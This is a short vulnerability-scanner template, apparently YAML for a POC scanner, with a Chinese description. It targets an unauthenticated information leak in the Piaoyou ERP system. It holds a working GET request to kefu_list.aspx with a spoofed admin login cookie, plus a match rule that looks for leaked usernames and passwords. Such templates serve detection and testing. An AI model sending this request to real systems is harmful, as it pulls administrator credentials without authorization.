漏洞描述
票友ERP系统存在信息泄露漏洞,未经授权的攻击者可通过该漏洞获取管理员账号密码信息。
id: piaoyou-erp-kefu-list-fileread
info:
name: 票友ERP系统kefu_list存在信息泄露
author: avic123
severity: high
verified: true
description: |
票友ERP系统存在信息泄露漏洞,未经授权的攻击者可通过该漏洞获取管理员账号密码信息。
reference:
- https://www.ddpoc.com/DVB-2025-9810.html
tags: piaoyou,erp,fileread
created: 2025/08/25
set:
hostname: request.url.host
rules:
r0:
request:
method: GET
path: /json_db/kefu_list.aspx?stype=0&_search=false&nd=1751246532981&rows=25&page=1&sidx=id&sord=asc
headers:
Cookie: pyerpcookie=loginname=admin
expression: response.status == 200 && response.body.bcontains(b'username') && response.body.bcontains(b'password') && response.body.bcontains(b'系统管理员')
expression: r0()